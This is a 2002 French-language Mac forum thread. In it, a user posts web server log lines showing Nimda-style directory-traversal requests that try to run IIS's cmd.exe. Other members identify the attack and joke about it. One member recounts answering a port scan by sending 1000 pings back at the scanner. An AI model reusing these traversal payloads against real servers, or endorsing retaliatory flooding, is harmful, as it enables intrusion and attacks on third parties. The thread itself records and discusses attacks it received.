Voir le sujet précédent :: Voir le sujet suivant |
Auteur |
Message |
jpblcm Membre hyperactif
Inscrit le: 26 Avr 2002 Messages: 567 Localisation: 2a (Patrie) 13 (au taf) 09 (par alliance)
|
Posté le: 12-Déc-02 21:24:29 Sujet du message: qui prends mon serveur web sous osX server pour windows ? |
|
|
heool,
voici un petit extrait de mon log du serveur web d'osX serveur - il est actif depuis 12 heures seulement. Je commence à comprendre qu'osX est un très bon choix
Code: |
80.8.5.90 - - [12/Dec/2002:19:29:38 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
80.8.5.90 - - [12/Dec/2002:19:29:39 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
80.8.5.90 - - [12/Dec/2002:19:29:39 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
80.8.5.90 - - [12/Dec/2002:19:29:39 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
80.8.5.90 - - [12/Dec/2002:19:29:39 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
80.8.5.90 - - [12/Dec/2002:19:29:40 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
80.8.5.90 - - [12/Dec/2002:19:29:40 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
80.8.5.90 - - [12/Dec/2002:19:29:40 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
80.8.5.90 - - [12/Dec/2002:19:29:40 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 |
autrement dit, "chante chante petit pirate de @ç&=/@......"
(nb. merci aux admins de modérer mes propos ) |
|
Revenir en haut |
|
|
CoreDumped Membre hyperactif
Inscrit le: 20 Fév 2002 Messages: 583 Localisation: Rumilly / Lugdunum
|
Posté le: 12-Déc-02 23:42:56 Sujet du message: |
|
|
Bonjour,
De mémoire c'est l'attaque nimda, je ne voudrais pas être désagréable, mais ce virus est complètement démodé!!!
CoreDumped _________________ Quand tout le reste a échoué, lire le manuel |
|
Revenir en haut |
|
|
jpblcm Membre hyperactif
Inscrit le: 26 Avr 2002 Messages: 567 Localisation: 2a (Patrie) 13 (au taf) 09 (par alliance)
|
Posté le: 12-Déc-02 23:51:46 Sujet du message: |
|
|
ben, dis le lui, si tu le vexes il me laissera peut être tranquille ..moi et mon serveur tout neuf !!! |
|
Revenir en haut |
|
|
Anthony Administrateur
Inscrit le: 07 Mar 2001 Messages: 7354 Localisation: Paris Nancy
|
|
Revenir en haut |
|
|
Mac Régis Modérateur
Inscrit le: 30 Jan 2002 Messages: 3085 Localisation: A Nantes ;-)
|
Posté le: 13-Déc-02 00:33:15 Sujet du message: |
|
|
jpblcm a écrit: | ben, dis le lui, si tu le vexes il me laissera peut être tranquille ..moi et mon serveur tout neuf !!! |
hé hé hé, faudrait l'informer qu'il n'est pas aux portes ouvertes de windows _________________ Configuration - Apple Store |
|
Revenir en haut |
|
|
SanLobo Connaisseur
Inscrit le: 25 Sep 2002 Messages: 150 Localisation: Marseille 9
|
Posté le: 13-Déc-02 13:57:37 Sujet du message: |
|
|
Ca me rappelle qu'au début où j'ai eu l'ADSL chez Free (octobre), au 2éme jour de connexion mon firewall (Netbarrier) m'a signalé un scan des ports de mon Mac. Sur le coup, interloqué car étant novice dans le domaine, ma seule réaction a été de couper ma connexion par précaution.
2 jours plus tard, même phénomène. L'adresse IP indiquée par Netbarrier était toujours la même. Et manifestement, c'était aussi un user de Free (mêmes digits au début de l'adresse).
Alors, j'ai envoyé par Ipnetmonitor 1000 pings à l'adresse IP tracée par le firewall, et depuis je n'ai plus eu ce genre de problème.
Mais, bon, peut-être que ce n'est que parce qu'entre-temps le pirate (en herbe, sans doute) s'est fait gaulé par d'autres.
C'était peut-être pas très sympa de ma part, mais c'est le seul truc que j'ai trouvé à faire.
Ce qui m'amène à poser la question : de quelles parades dispose-t-on face à ce genre d'attaque ?
Autre curieux phénomène : il m'arrive d'être branché sur un serveur Hotline sans faire ni téléchargement, ni téléversement.
Et pourtant, le voyant "activité ethernet" de mon Barricade clignote comme un fou et Netbarrier me signale un transit de données important en E/S (je ne suis pas connecté en http à ce moment-là).
Ceci ne s'est produit que sur quelques serveurs.
Est-il possible que depuis un serveur Hotline on puisse venir se balader sur ma machine ? (Netbarrier ne me signale aucune intrusion, et pourtant...)
Je n'ai jamais eu ce phénomène sous Carracho. _________________ Vous n'aurez pas ma fleur,
Celle qui me pousse à l'intérieur
(François Béranger)
|
|
Revenir en haut |
|
|
|